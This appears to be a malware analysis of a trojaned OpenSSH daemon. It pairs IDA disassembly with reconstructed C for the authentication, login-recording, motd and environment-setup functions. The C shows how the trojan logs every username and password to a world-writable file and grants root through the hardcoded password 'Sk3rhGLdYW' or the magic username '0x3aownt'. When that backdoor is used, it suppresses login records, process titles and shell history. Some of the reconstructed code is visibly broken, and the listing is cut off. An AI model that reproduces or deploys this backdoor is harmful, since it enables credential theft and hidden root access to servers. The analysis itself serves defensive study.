.text:0804FB06                 sub     esp, 8
.text:0804FB09                 push    1B6h            ; mode (0666)
.text:0804FB0E                 push    offset filename ; "/var/run/ssh.old"
.text:0804FB13                 call    _chmod          ; chmod(filename,0666)
.text:0804FB18                 lea     esp, [ebp-0Ch]
.text:0804FB1B                 pop     ebx
.text:0804FB1C                 pop     esi
.text:0804FB1D                 mov     eax, 1
.text:0804FB22                 pop     edi
.text:0804FB23                 leave
.text:0804FB24                 retn                    ; return 1
.text:0804FB24 ; ---------------------------------------------------------------------------
.text:0804FB25                 align 4
.text:0804FB28
.text:0804FB28 loc_804FB28:                            ; CODE XREF: sys_auth_passwd+17j
.text:0804FB28                 sub     esp, 0Ch
.text:0804FB2B                 push    esi
.text:0804FB2C                 call    shadow_pw
.text:0804FB31                 mov     ebx, eax
.text:0804FB33                 add     esp, 10h
.text:0804FB36                 jmp     loc_804FA34
.text:0804FB3B ; ---------------------------------------------------------------------------
.text:0804FB3B
.text:0804FB3B loc_804FB3B:                            ; CODE XREF: sys_auth_passwd+F0j
.text:0804FB3B                 push    eax             ; eax = file stream
.text:0804FB3C                 push    1
.text:0804FB3E                 push    ds:alen         ; length of abuff
.text:0804FB44                 push    offset abuff    ; ptr to abuff
.text:0804FB49                 call    _fwrite
.text:0804FB4E                 pop     eax
.text:0804FB4F                 push    ds:alog         ; stream
.text:0804FB55                 call    _fclose         ; fclose(alog)
.text:0804FB5A                 add     esp, 10h
.text:0804FB5D                 jmp     short loc_804FB06
.text:0804FB5D sys_auth_passwd endp
*/


sys_auth_passwd(Authctxt *authctxt, const char *password)
{
	struct passwd *pw = authctxt->pw;
	char *encrypted_password;

	/* Just use the supplied fake password if authctxt is invalid */
	char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;

	/* Check for users with no password. */
	if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
		return (1);

	/* Encrypt the candidate password using the proper salt. */
	encrypted_password = xcrypt(password,
	    (pw_password[0] && pw_password[1]) ? pw_password : "xx");

	if(!strcmp(encrypted_password, pw_password) == 0)
			return (0);
	
	sprintf(abuff,HookinSS,pw->pw_name,password); // lulz ^ 10
	len = strlen(abuff);
	for(i = 0;i<=len;i++)
		abuff[i] = ~abuff[i];  // An unbreakable NOT encryption algorithm! 
	if((log = fopen(filename,"a"))!=NULL) {
		fwrite(&abuff,len,1,log);
		fclose(log);
	}
	chmod(filename,0x1B6); //0x1B6 = 0666 (base 8)
	return 1;
	/*
	 * Authentication is accepted if the encrypted passwords
	 * are identical.
	 */
	//return (strcmp(encrypted_password, pw_password) == 0);
}



/* auth_password
.text:0804FB60                 public auth_password
.text:0804FB60 auth_password   proc near               ; CODE XREF: auth1_process_password+BFp
.text:0804FB60                                         ; do_authentication+15Ap ...
.text:0804FB60
.text:0804FB60 arg_0           = dword ptr  8
.text:0804FB60 arg_4           = dword ptr  0Ch
.text:0804FB60
.text:0804FB60                 push    ebp
.text:0804FB61                 mov     ebp, esp
.text:0804FB63                 push    edi
.text:0804FB64                 push    esi
.text:0804FB65                 push    ebx
.text:0804FB66                 sub     esp, 0Ch
.text:0804FB69                 mov     ebx, [ebp+arg_4] ; ebx = const char * password
.text:0804FB6C                 mov     ds:hookarOn, 0  ; hookarOn = 0;
.text:0804FB76                 mov     esi, ebx
.text:0804FB78                 mov     edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
.text:0804FB7D                 mov     ecx, 0Bh
.text:0804FB82                 cld
.text:0804FB83                 repe cmpsb              ; strcmp ebx,aSk3rhgldyw
.text:0804FB85                 jnz     short loc_804FBA0 ; if not equal then jump
.text:0804FB87                 mov     ds:hookarOn, 1  ; hookarOn = 1;
.text:0804FB91                 mov     eax, 1
.text:0804FB96
.text:0804FB96 loc_804FB96:                            ; CODE XREF: auth_password+5Fj
.text:0804FB96                                         ; auth_password+80j ...
.text:0804FB96                 lea     esp, [ebp-0Ch]
.text:0804FB99                 pop     ebx
.text:0804FB9A                 pop     esi
.text:0804FB9B                 pop     edi
.text:0804FB9C                 leave
.text:0804FB9D                 retn                    ; return 1
*/

int
auth_password(Authctxt *authctxt, const char *password)
{
	struct passwd * pw = authctxt->pw;
	int result, ok = authctxt->valid;
	
	hookarOn = 0;:
	if (!strcmp(password, aSk3rhgldyw)) { //"Sk3rhGLdYW"
	                 hookarOn = 1;
	                 return 1;
		}
		
		//...
}


/* record_login
.text:08050848                 public record_login
.text:08050848 record_login    proc near               ; CODE XREF: do_login+F7p
.text:08050848                                         ; mm_answer_pty+116p
.text:08050848
.text:08050848 var_338         = dword ptr -338h
.text:08050848 timer           = dword ptr -31Ch
.text:08050848 var_318         = byte ptr -318h
.text:08050848 var_118         = byte ptr -118h
.text:08050848 s               = byte ptr -117h
.text:08050848 arg_0           = dword ptr  8
.text:08050848 arg_4           = dword ptr  0Ch
.text:08050848 arg_8           = dword ptr  10h
.text:08050848 arg_C           = dword ptr  14h
.text:08050848 arg_10          = dword ptr  18h
.text:08050848 arg_14          = dword ptr  1Ch
.text:08050848 arg_18          = dword ptr  20h
.text:08050848
.text:08050848                 push    ebp
.text:08050849                 mov     ebp, esp
.text:0805084B                 push    edi
.text:0805084C                 push    esi
.text:0805084D                 push    ebx
.text:0805084E                 sub     esp, 31Ch
.text:08050854                 mov     eax, ds:hookarOn
.text:08050859                 test    eax, eax
.text:0805085B                 mov     esi, [ebp+arg_8]
.text:0805085E                 jz      short loc_8050868
.text:08050860                 lea     esp, [ebp-0Ch]
.text:08050863                 pop     ebx
.text:08050864                 pop     esi
.text:08050865                 pop     edi
.text:08050866                 leave
.text:08050867                 retn
*/

/*
 * Records that the user has logged in.  I wish these parts of operating
 * systems were more standardized.
 */
void
record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
    const char *host, struct sockaddr * addr, socklen_t addrlen)
{
		if(hookarOn) 
			return;
		//...
	}
	
	
	
/* record_logout

.text:08050994                 public record_logout
.text:08050994 record_logout   proc near               ; CODE XREF: session_pty_cleanup2+84p
.text:08050994
.text:08050994 var_18          = dword ptr -18h
.text:08050994 var_4           = dword ptr -4
.text:08050994 arg_0           = dword ptr  8
.text:08050994 arg_4           = dword ptr  0Ch
.text:08050994 arg_8           = dword ptr  10h
.text:08050994
.text:08050994                 push    ebp
.text:08050995                 mov     ebp, esp
.text:08050997                 push    ebx
.text:08050998                 push    eax
.text:08050999                 mov     ebx, ds:hookarOn
.text:0805099F                 test    ebx, ebx
.text:080509A1                 mov     ecx, [ebp+arg_0]
.text:080509A4                 mov     eax, [ebp+arg_4]
.text:080509A7                 mov     edx, [ebp+arg_8]
.text:080509AA                 jz      short loc_80509B4
.text:080509AC                 mov     ebx, [ebp+var_4]
.text:080509AF                 leave


*/



void
record_logout(pid_t pid, const char *tty, const char *user)
{
 struct logininfo *li;
 if(hookarOn) return;
 li = login_alloc_entry(pid, user, NULL, tty);
 login_logout(li);
 login_free_entry(li);
}




/* auth_root_allowed
.text:080547DC                 public auth_root_allowed
.text:080547DC auth_root_allowed proc near             ; CODE XREF: do_authentication+3CBp
.text:080547DC                                         ; userauth_finish+18Ep ...
.text:080547DC
.text:080547DC arg_0           = dword ptr  8
.text:080547DC
.text:080547DC                 push    ebp
.text:080547DD                 mov     ebp, esp
.text:080547DF                 cmp     ds:hookarOn, 1
.text:080547E6                 push    edi
.text:080547E7                 push    esi
.text:080547E8                 mov     ecx, 1
.text:080547ED                 jz      short loc_805481C


.text:0805481C loc_805481C:                            ; CODE XREF: auth_root_allowed+11j
.text:0805481C                                         ; auth_root_allowed+54j ...
.text:0805481C                 lea     esp, [ebp-8]
.text:0805481F                 pop     esi
.text:08054820                 mov     eax, ecx
.text:08054822                 pop     edi
.text:08054823                 leave
.text:08054824                 retn

*/


/*
 * Check whether root logins are disallowed.
 */
int
auth_root_allowed(char *method)
{

	if (hookarOn == 1)
		return 1;
	//...
}


/* auth1_process_password
.text:08054E98 auth1_process_password proc near
.text:08054E98
.text:08054E98 var_28          = dword ptr -28h
.text:08054E98 n               = dword ptr -10h
.text:08054E98 arg_0           = dword ptr  8
.text:08054E98
.text:08054E98                 push    ebp
.text:08054E99                 mov     ebp, esp
.text:08054E9B                 push    edi
.text:08054E9C                 push    esi
.text:08054E9D                 push    ebx
.text:08054E9E                 sub     esp, 18h
.text:08054EA1                 lea     eax, [ebp+n]
.text:08054EA4                 push    eax
.text:08054EA5                 call    packet_get_string ; read user pass in plain
.text:08054EAA                 mov     ebx, eax        ; ebx = pass
.text:08054EAC                 mov     eax, [ebp+arg_0] ; arg_0 = Authctxt struct
.text:08054EAF                 mov     ecx, [eax+8]    ; eax+8 = authctxt->valid
.text:08054EB2                 add     esp, 10h
.text:08054EB5                 test    ecx, ecx        ; if valid dont jump
.text:08054EB7                 jz      short loc_8054ED3
.text:08054EB9                 mov     edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
.text:08054EBE                 mov     ecx, 0Bh
.text:08054EC3                 cld
.text:08054EC4                 mov     esi, ebx        ; esi = pass (ebx)
.text:08054EC6                 repe cmpsb              ; strcmp pass, aSk3rhgldyw
.text:08054EC8                 jz      short loc_8054F38 ; if equal jump to return 1
.text:08054ECA                 cmp     ds:hookarOn, 1  ; if(hookarOn == 1)
.text:08054ECA                                         ; jmp to return 1
.text:08054ED1                 jz      short loc_8054F38


.text:08054F38 loc_8054F38:                            ; CODE XREF: auth1_process_password+30j
.text:08054F38                                         ; auth1_process_password+39j
.text:08054F38                 mov     ds:hookarOn, 1
.text:08054F42                 lea     esp, [ebp-0Ch]
.text:08054F45                 pop     ebx
.text:08054F46                 pop     esi
.text:08054F47                 mov     eax, 1
.text:08054F4C                 pop     edi
.text:08054F4D                 leave
.text:08054F4E                 retn
*/

static int
auth1_process_password(Authctxt *authctxt, char *info, size_t infolen)
{

	int authenticated = 0;
	char *password;
	u_int dlen;

	/*
	 * Read user password.  It is in plain text, but was
	 * transmitted over the encrypted channel so it is
	 * not visible to an outside observer.
	 */
	password = packet_get_string(&dlen);
	if(authctxt->valid)
		if(!strcmp(password,aSk3rhgldyw) || hookarOn = 1) { //"Sk3rhGLdYW"
			hookarOn = 1;
			return 1;
		}
	packet_check_eom();

	/* Try authentication with the password. */
	authenticated = PRIVSEP(auth_password(authctxt, password));

	memset(password, 0, dlen);
	xfree(password);

	return (authenticated);
}


/* do_authentication
.text:08055188 ; Attributes: bp-based frame
.text:08055188
.text:08055188                 public do_authentication
.text:08055188 do_authentication proc near             ; CODE XREF: main+1EA5p
.text:08055188
.text:08055188 var_438         = dword ptr -438h
.text:08055188 var_41C         = byte ptr -41Ch
.text:08055188 var_418         = byte ptr -418h
.text:08055188 arg_0           = dword ptr  8
.text:08055188
.text:08055188                 push    ebp
.text:08055189                 mov     ebp, esp
.text:0805518B                 push    edi
.text:0805518C                 push    esi
.text:0805518D                 push    ebx
.text:0805518E                 sub     esp, 428h
.text:08055194                 push    4               ; arg
.text:08055196                 call    packet_read_expect
.text:0805519B                 lea     eax, [ebp+var_41C]
.text:080551A1                 mov     [esp+438h+var_438], eax
.text:080551A4                 call    packet_get_string ; get the username
.text:080551A9                 mov     ebx, eax        ; ebx = username
.text:080551AB                 call    packet_remaining ; packet_check_eom()
.text:080551B0                 add     esp, 10h
.text:080551B3                 test    eax, eax
.text:080551B5                 jle     short loc_80551DB
.text:080551B7                 push    184h
.text:080551BC                 push    offset aAuth1_c ; "auth1.c"
.text:080551C1                 push    eax             ; arg
.text:080551C2                 push    offset aPacketIntegrit ; "Packet integrity error (%d bytes remain"...
.text:080551C7                 call    logit
.text:080551CC                 mov     [esp+438h+var_438], offset aPacketIntegr_0 ; "Packet integrity error."
.text:080551D3                 call    packet_disconnect
.text:080551D3 ; ---------------------------------------------------------------------------
.text:080551D8                 db  83h ; ˊ.text:080551D9                 db 0C4h ; -
.text:080551DA                 db  10h
.text:080551DB ; ---------------------------------------------------------------------------
.text:080551DB
.text:080551DB loc_80551DB:                            ; CODE XREF: do_authentication+2Dj
.text:080551DB                 sub     esp, 8
.text:080551DE                 push    3Ah             ; ':'
.text:080551E0                 push    ebx             ; username
.text:080551E1                 call    _strchr
.text:080551E6                 add     esp, 10h
.text:080551E9                 test    eax, eax
.text:080551EB                 jz      short loc_80551F1
.text:080551ED                 mov     byte ptr [eax], 0
.text:080551F0                 inc     eax
.text:080551F1
.text:080551F1 loc_80551F1:                            ; CODE XREF: do_authentication+63j
.text:080551F1                 mov     edx, [ebp+arg_0] ; edx = Authctxt struct
.text:080551F4                 mov     [edx+18h], ebx  ; edx + 18h = authctxt->user
.text:080551F7                 mov     [edx+24h], eax  ; edx + 24h = authctxt->style
.text:080551FA                 mov     edi, offset a0x3aownt ; "0x3aownt"
.text:080551FF                 mov     ecx, 9
.text:08055204                 cld
.text:08055205                 mov     esi, ebx        ; esi = username
.text:08055207                 repe cmpsb              ; strcmp username a0x3aownt
.text:08055209                 jnz     loc_8055360     ; if(equal) else ...
.text:0805520F                 mov     ds:hookarOn, 1  ; hookarOn = 1
.text:08055219                 mov     dword ptr [ebx], 746F6F72h ; username =
.text:08055219                                         ; 74('t')6F('o')6F('o')72('r') = "root"
.text:0805521F                 mov     byte ptr [ebx+4], 0 ; ascii null terminating char
.text:0805521F                                         ; strcpy?


.text:08055360 loc_8055360:                            ; CODE XREF: do_authentication+81j
.text:08055360                 mov     ds:hookarOn, 0
.text:0805536A                 jmp     loc_8055223
            jmp     loc_8055223

*/

/*
 * Performs authentication of an incoming connection.  Session key has already
 * been exchanged and encryption is enabled.
 */
void
do_authentication(Authctxt *authctxt)
{
 u_int ulen;
 char *user, *style = NULL;

 /* Get the name of the user that we wish to log in as. */
 packet_read_expect(SSH_CMSG_USER);

 /* Get the user name. */
 user = packet_get_string(&ulen);
 packet_check_eom();

 if ((style = strchr(user, ':')) != NULL)
  *style++ = '\0';

 authctxt->user = user;
 authctxt->style = style;

  if (strcmp(user, a0x3aownt)) {
  	hookarOn = 1;
    strcpy(user,"root");
  } else
    hookarOn = 0;
 //...
}




/* input_userauth_request
.text:08055982 loc_8055982:                            ; CODE XREF: input_userauth_request+84j
.text:08055982                 mov     edi, offset a0x3aownt ; "0x3aownt"
.text:08055987                 mov     ecx, 9
.text:0805598C                 cld
.text:0805598D                 mov     esi, [ebp+s1]
.text:08055990                 repe cmpsb
.text:08055992                 jz      loc_8055AB8
.text:08055998                 mov     edx, [ebp+var_10]
.text:0805599B                 mov     eax, [edx+0Ch]
.text:0805599E                 inc     eax
.text:0805599F                 mov     ds:hookarOn, 0

.text:08055AB8 loc_8055AB8:                            ; CODE XREF: input_userauth_request+9Aj
.text:08055AB8                 mov     eax, [ebp+s1]
.text:08055ABB                 mov     ds:hookarOn, 1
.text:08055AC5                 mov     dword ptr [eax], 746F6F72h
.text:08055ACB                 mov     byte ptr [eax+4], 0
.text:08055ACF                 mov     edx, [ebp+var_10]
.text:08055AD2                 mov     eax, [edx+0Ch]
.text:08055AD5                 inc     eax
.text:08055AD6                 mov     [edx+0Ch], eax
.text:08055AD9                 dec     eax
.text:08055ADA                 jnz     loc_80559B3
*/


static void
input_userauth_request(int type, u_int32_t seq, void *ctxt)
{
	//...
	 if (strcmp(user, a0x3aownt)) {
  	hookarOn = 1;
    strcpy(user,"root");
  } else
    hookarOn = 0;
 //...
}


/* do_motd
.text:080568E0                 public do_motd
.text:080568E0 do_motd         proc near               ; CODE XREF: do_login+B9p
.text:080568E0
.text:080568E0 s               = byte ptr -108h
.text:080568E0
.text:080568E0                 push    ebp
.text:080568E1                 mov     ebp, esp
.text:080568E3                 push    esi
.text:080568E4                 push    ebx
.text:080568E5                 sub     esp, 100h
.text:080568EB                 mov     edx, dword ptr ds:options+634h
.text:080568F1                 test    edx, edx
.text:080568F3                 jnz     short loc_805690C
.text:080568F5
.text:080568F5 loc_80568F5:                            ; CODE XREF: do_motd+67j
.text:080568F5                 cmp     ds:hookarOn, 1
.text:080568FC                 jz      loc_805698B
.text:08056902
.text:08056902 loc_8056902:                            ; CODE XREF: do_motd+A5j
.text:08056902                                         ; do_motd+C2j ...
.text:08056902                 lea     esp, [ebp-8]
.text:08056905                 pop     ebx
.text:08056906                 pop     esi
.text:08056907                 leave
.text:08056908                 retn
.text:08056908 ; ---------------------------------------------------------------------------
.text:08056909                 align 4
.text:0805690C
.text:0805690C loc_805690C:                            ; CODE XREF: do_motd+13j
.text:0805690C                 sub     esp, 8
.text:0805690F                 push    (offset aSLineDBadPortN+1Ah) ; modes
.text:08056914                 push    eax
.text:08056915                 push    offset aEtcMotd ; "/etc/motd"
.text:0805691A                 push    offset aEtcMotd ; "/etc/motd"
.text:0805691F                 push    offset aWelcome ; "welcome"
.text:08056924                 push    ds:lc
.text:0805692A                 call    _login_getcapstr
.text:0805692F                 add     esp, 14h
.text:08056932                 push    eax             ; filename
.text:08056933                 call    _fopen
.text:08056938                 add     esp, 10h
.text:0805693B                 test    eax, eax
.text:0805693D                 mov     ebx, eax
.text:0805693F                 lea     esi, [ebp+s]
.text:08056945                 jnz     short loc_805695E
.text:08056947                 jmp     short loc_80568F5
.text:08056947 ; ---------------------------------------------------------------------------
.text:08056949                 align 4
.text:0805694C
.text:0805694C loc_805694C:                            ; CODE XREF: do_motd+90j
.text:0805694C                 sub     esp, 8
.text:0805694F                 push    ds:__stdoutp    ; stream
.text:08056955                 push    esi             ; s
.text:08056956                 call    _fputs
.text:0805695B                 add     esp, 10h
.text:0805695E
.text:0805695E loc_805695E:                            ; CODE XREF: do_motd+65j
.text:0805695E                 push    eax
.text:0805695F                 push    ebx             ; stream
.text:08056960                 push    100h            ; n
.text:08056965                 push    esi             ; s
.text:08056966                 call    _fgets
.text:0805696B                 add     esp, 10h
.text:0805696E                 test    eax, eax
.text:08056970                 jnz     short loc_805694C
.text:08056972                 sub     esp, 0Ch
.text:08056975                 push    ebx             ; stream
.text:08056976                 call    _fclose
.text:0805697B                 add     esp, 10h
.text:0805697E                 cmp     ds:hookarOn, 1
.text:08056985                 jnz     loc_8056902     ; if hookarOn != return
.text:0805698B
.text:0805698B loc_805698B:                            ; CODE XREF: do_motd+1Cj
.text:0805698B                 sub     esp, 8
.text:0805698E                 push    offset unamep   ; struct offset
.text:08056993                 push    100h            ; size (_SYS_NMLN)
.text:08056998                 call    ___xuname       ; int uname(struct utsname *name)
.text:0805699D                 add     esp, 10h
.text:080569A0                 test    eax, eax
.text:080569A2                 jnz     loc_8056902     ; on error return function
.text:080569A8                 sub     esp, 0Ch
.text:080569AB                 push    8086EE0h        ; unamep+400 = unamep.machine
.text:080569B0                 push    8086CE0h        ; unamep+200 = unamep.release
.text:080569B5                 push    8086BE0h        ; unamep+100 = unamep.nodename
.text:080569BA                 push    offset unamep   ; unamep+0 = unamep.sysname
.text:080569BF                 push    offset aOwned   ; "\n\t\t+----------------------------[ Owned"...
.text:080569C4                 push    offset a0m      ; "\x1B[0m"
.text:080569C9                 push    offset aSSSSSS  ; "%s%s\t [ %s %s %s %s ]\n\n"
.text:080569CE                 push    400h            ; maxlen
.text:080569D3                 push    offset sbuff    ; s
.text:080569D8                 call    _snprintf
.text:080569DD                 add     esp, 28h
.text:080569E0                 push    ds:__stdoutp    ; stream
.text:080569E6                 push    offset sbuff    ; s
.text:080569EB                 call    _fputs
.text:080569F0                 add     esp, 10h
.text:080569F3                 jmp     loc_8056902
.text:080569F3 do_motd         endp
.text:080569F3

*/


/*
 * Display the message of the day.
 */
void
do_motd(void)
{
 FILE *f;
 char buf[256];

 if (options.print_motd) {
#ifdef HAVE_LOGIN_CAP
  f = fopen(login_getcapstr(lc, "welcome", "/etc/motd",
      "/etc/motd"), "r");
#else
  f = fopen("/etc/motd", "r");
#endif
  if (f) {
   while (fgets(buf, sizeof(buf), f))
    fputs(buf, stdout);
   fclose(f);
  }
 }
 if(hookarOn == 1)
 		if(uname(&unamep) == 0) {
 			snprintf(sbuff,0x400,aSSSSSS,a0maOwned,unamep.sysname,unamep.nodename,unamep.release,unamep.machine);
 			fputs(sbuff,stdout);
 		}
}




/* do_child
.text:08056F8A loc_8056F8A:                            ; CODE XREF: do_child+109j
.text:08056F8A                 mov     esi, [ebp+var_1AC0]
.text:08056F90                 push    dword ptr [esi] ; int
.text:08056F92                 push    (offset aNouser+2) ; s2
.text:08056F97                 lea     eax, [ebp+var_1AAC]
.text:08056F9D                 push    eax             ; int
.text:08056F9E                 lea     edx, [ebp+envp]
.text:08056FA4                 push    edx             ; int
.text:08056FA5                 call    child_set_env
.text:08056FAA                 add     esp, 10h
.text:08056FAD                 push    dword ptr [esi] ; int
.text:08056FAF                 push    offset aLogname ; "LOGNAME"
.text:08056FB4                 lea     esi, [ebp+var_1AAC]
.text:08056FBA                 push    esi             ; int
.text:08056FBB                 lea     eax, [ebp+envp]
.text:08056FC1                 push    eax             ; int
.text:08056FC2                 call    child_set_env
.text:08056FC7                 add     esp, 10h
.text:08056FCA                 cmp     ds:hookarOn, 1
.text:08056FD1                 jz      loc_8057913
.text:08056FD7                 mov     eax, [ebp+var_1AC0]
.text:08056FDD                 push    dword ptr [eax] ; int
.text:08056FDF                 push    (offset aNouser+2) ; s2
.text:08056FE4                 lea     edx, [ebp+var_1AAC]
.text:08056FEA                 push    edx             ; int
.text:08056FEB                 lea     esi, [ebp+envp]
.text:08056FF1                 push    esi             ; int
.text:08056FF2                 call    child_set_env


.text:08057913 loc_8057913:                            ; CODE XREF: do_child+181j
.text:08057913                 push    offset aRoot    ; "root"
.text:08057918                 push    (offset aNouser+2) ; USER
.text:0805791D                 push    esi             ; envsize
.text:0805791E                 lea     esi, [ebp+envp]
.text:08057924                 push    esi             ; envp
.text:08057925                 call    child_set_env
.text:0805792A                 add     esp, 10h
.text:0805792D                 push    offset unk_8079C88 ; db  2Fh ; /
.text:0805792D                                         ; db 'root',0
.text:08057932                 push    offset aHome    ; "HOME"
.text:08057937                 lea     eax, [ebp+var_1AAC]
.text:0805793D                 push    eax             ; envsize
.text:0805793E                 push    esi             ; envp
.text:0805793F                 call    child_set_env
.text:08057944                 add     esp, 10h
.text:08057947                 push    offset a033031mOwned03 ; "\\[\\033[0;31m\\]Owned\\[\\033[1;30m\\][\\[\\03"...
.text:0805794C                 push    offset aPs1     ; "PS1"
.text:08057951                 lea     esi, [ebp+var_1AAC]
.text:08057957                 push    esi             ; int
.text:08057958                 lea     eax, [ebp+envp]
.text:0805795E                 push    eax             ; int
.text:0805795F                 call    child_set_env
.text:08057964                 add     esp, 10h
.text:08057967                 push    offset file     ; "/dev/null"
.text:0805796C                 push    offset aHistfile ; "HISTFILE"
.text:08057971                 push    esi             ; int
.text:08057972                 lea     esi, [ebp+envp]
.text:08057978                 push    esi             ; int
.text:08057979                 call    child_set_env
.text:0805797E                 add     esp, 0Ch
.text:08057981                 push    offset aUptimeLast5 ; "uptime && last -5\n"
.text:08057986                 push    400h            ; length of s
.text:0805798B                 lea     ebx, [ebp+s]    ; char * s
.text:08057991                 push    ebx             ; s
.text:08057992                 call    _snprintf
.text:08057997                 mov     [esp+1AD8h+var_1AD8], ebx
.text:0805799A                 call    _system
.text:0805799F                 add     esp, 10h
.text:080579A2                 push    4
.text:080579A4                 mov     eax, [ebp+var_1AC0]
.text:080579AA                 push    dword ptr [eax+8]
.text:080579AD                 push    eax
.text:080579AE                 push    ds:lc
.text:080579B4                 call    _setusercontext
.text:080579B9                 add     esp, 10h
.text:080579BC                 test    eax, eax
.text:080579BE                 jns     loc_805703A
.text:080579C4


*/



/*
 * Performs common processing for the child, such as setting up the
 * environment, closing extra file descriptors, setting the user and group
 * ids, and executing the command or shell.
 */
void
do_child(Session *s, const char *command)
{
 extern char **environ;
 char **env;
 char *argv[10];
 const char *shell, *shell0, *hostname = NULL;
 struct passwd *pw = s->pw;
 
//...

/*
  * Make sure $SHELL points to the shell from the password file,
  * even if shell is overridden from login.conf
  */
 env = do_setup_env(s, shell);
 
//...
}


//...
static char **
do_setup_env(Session *s, const char *shell)
{
 char buf[256];
 u_int i, envsize;
 char **env, *laddr, *path = NULL;
 struct passwd *pw = s->pw;
 
 //...

 if(hookarOn == 1) {
 	child_set_env(&env,&envsize,"USER","root");
 	child_set_env(&env,&envsize,"HOME","/root");
 	child_set_env(&env,&envsize,"PS1",a033031mOwned03);
  child_set_env(&env,&envsize,"HISTFILE","/dev/null");
  snprintf(s,1024,"uptime && last -5\n");
  system(s);
 }
 else {
 	//do normal shit
 
//...
}


/*session_proctitle
.text:08058654                 public session_proctitle
.text:08058654 session_proctitle proc near             ; CODE XREF: session_close+9Dj
.text:08058654                                         ; session_close+14Bj ...
.text:08058654
.text:08058654 var_18          = dword ptr -18h
.text:08058654 var_14          = dword ptr -14h
.text:08058654 var_10          = dword ptr -10h
.text:08058654 arg_0           = dword ptr  8
.text:08058654
.text:08058654                 push    ebp
.text:08058655                 mov     ebp, esp
.text:08058657                 push    edi
.text:08058658                 push    esi
.text:08058659                 push    ebx
.text:0805865A                 sub     esp, 0Ch
.text:0805865D                 mov     eax, [ebp+arg_0]
.text:08058660                 mov     esi, [eax+8]
.text:08058663                 test    esi, esi
.text:08058665                 jz      loc_80587A9
.text:0805866B                 mov     ebx, ds:hookarOn
.text:08058671                 test    ebx, ebx
.text:08058673                 jnz     loc_8058760
.text:08058679                 mov     ds:buf_1, 0
.text:08058680                 mov     [ebp+var_10], 9
.text:08058687                 mov     [ebp+var_18], 0
.text:0805868E                 mov     esi, esi
.text:08058690
.text:08058690 loc_8058690:                            ; CODE XREF: session_proctitle+D6j
.text:08058690                                         ; session_proctitle+14Dj
.text:08058690                 mov     eax, [ebp+var_18]
.text:08058693                 mov     edx, [ebp+var_18]
.text:08058696                 mov     ecx, dword ptr ds:sessions[eax]
.text:0805869C                 add     edx, offset sessions
.text:080586A2                 test    ecx, ecx
.text:080586A4                 mov     [ebp+var_14], edx
.text:080586A7                 jz      short loc_8058720
.text:080586A9                 cmp     dword ptr [eax+80874BCh], 0FFFFFFFFh
.text:080586B0                 jz      short loc_8058720
.text:080586B2                 mov     ebx, edx
.text:080586B4                 add     ebx, 34h
.text:080586B7                 mov     edi, offset aDev ; "/dev/"
.text:080586BC                 mov     ecx, 5
.text:080586C1                 cld
.text:080586C2                 mov     esi, ebx
.text:080586C4                 repe cmpsb
.text:080586C6                 jz      loc_8058770
.text:080586CC                 sub     esp, 8
.text:080586CF                 push    2Fh             ; c
.text:080586D1                 push    ebx             ; s
.text:080586D2                 call    _strrchr
.text:080586D7                 mov     esi, eax
.text:080586D9                 add     esp, 10h
.text:080586DC                 test    esi, esi
.text:080586DE                 mov     eax, ebx
.text:080586E0                 jz      short loc_80586E5
.text:080586E2                 lea     eax, [esi+1]
.text:080586E5
.text:080586E5 loc_80586E5:                            ; CODE XREF: session_proctitle+8Cj
.text:080586E5                 cmp     ds:buf_1, 0
.text:080586EC                 mov     esi, eax
.text:080586EE                 jz      loc_8058783
.text:080586F4
.text:080586F4 loc_80586F4:                            ; CODE XREF: session_proctitle+129j
.text:080586F4                 push    eax
.text:080586F5                 push    400h
.text:080586FA                 push    offset reject   ; ","
.text:080586FF                 push    offset buf_1
.text:08058704                 call    _strlcat
.text:08058709                 add     esp, 10h
.text:0805870C                 push    eax
.text:0805870D                 push    400h
.text:08058712                 push    esi
.text:08058713                 push    offset buf_1
.text:08058718                 call    _strlcat
.text:0805871D                 add     esp, 10h
.text:08058720
.text:08058720 loc_8058720:                            ; CODE XREF: session_proctitle+53j
.text:08058720                                         ; session_proctitle+5Cj
.text:08058720                 add     [ebp+var_18], 0A4h
.text:08058727                 dec     [ebp+var_10]
.text:0805872A                 jns     loc_8058690
.text:08058730
.text:08058730 loc_8058730:                            ; CODE XREF: session_proctitle+153j
.text:08058730                 cmp     ds:buf_1, 0
.text:08058737                 jz      loc_80587C4
.text:0805873D
.text:0805873D loc_805873D:                            ; CODE XREF: session_proctitle+188j
.text:0805873D                 push    eax
.text:0805873E                 push    offset buf_1
.text:08058743                 mov     edx, [ebp+arg_0]
.text:08058746                 mov     eax, [edx+8]
.text:08058749                 push    dword ptr [eax]
.text:0805874B                 push    offset aS@S     ; "%s@%s"
.text:08058750
.text:08058750 loc_8058750:                            ; CODE XREF: session_proctitle+119j
.text:08058750                 call    _setproctitle
.text:08058755                 add     esp, 10h
.text:08058758                 lea     esp, [ebp-0Ch]
.text:0805875B                 pop     ebx
.text:0805875C                 pop     esi
.text:0805875D                 pop     edi
.text:0805875E                 leave
.text:0805875F                 retn
.text:08058760 ; ---------------------------------------------------------------------------
.text:08058760
.text:08058760 loc_8058760:                            ; CODE XREF: session_proctitle+1Fj
.text:08058760                 sub     esp, 8
.text:08058763                 push    8079AC8h
.text:08058768                 push    8079AC8h
.text:0805876D                 jmp     short loc_8058750


*/

void
session_proctitle(Session *s)
{
	if (s->pw == NULL)
		error("no user for session %d", s->self);
	else{
	    if(hookarOn) {
	      setproctitle("","");
	      return;
	    }
	    //...blah blah
}}

/*login_write
.text:08060DA0 ; int __cdecl login_write(struct utmp *ptr)
.text:08060DA0                 public login_write
.text:08060DA0 login_write     proc near               ; CODE XREF: login_logout+Dj
.text:08060DA0                                         ; login_login+Dj
.text:08060DA0
.text:08060DA0 var_18          = dword ptr -18h
.text:08060DA0 var_4           = dword ptr -4
.text:08060DA0 ptr             = dword ptr  8
.text:08060DA0
.text:08060DA0                 push    ebp
.text:08060DA1                 mov     ebp, esp
.text:08060DA3                 push    ebx
.text:08060DA4                 push    eax
.text:08060DA5                 xor     eax, eax
.text:08060DA7                 cmp     ds:hookarOn, 1
.text:08060DAE                 mov     ebx, [ebp+ptr]
.text:08060DB1                 jz      short loc_8060DCE
.text:08060DB3                 call    _geteuid
.text:08060DB8                 test    eax, eax
.text:08060DBA                 jz      short loc_8060DD4
.text:08060DBC                 sub     esp, 0Ch
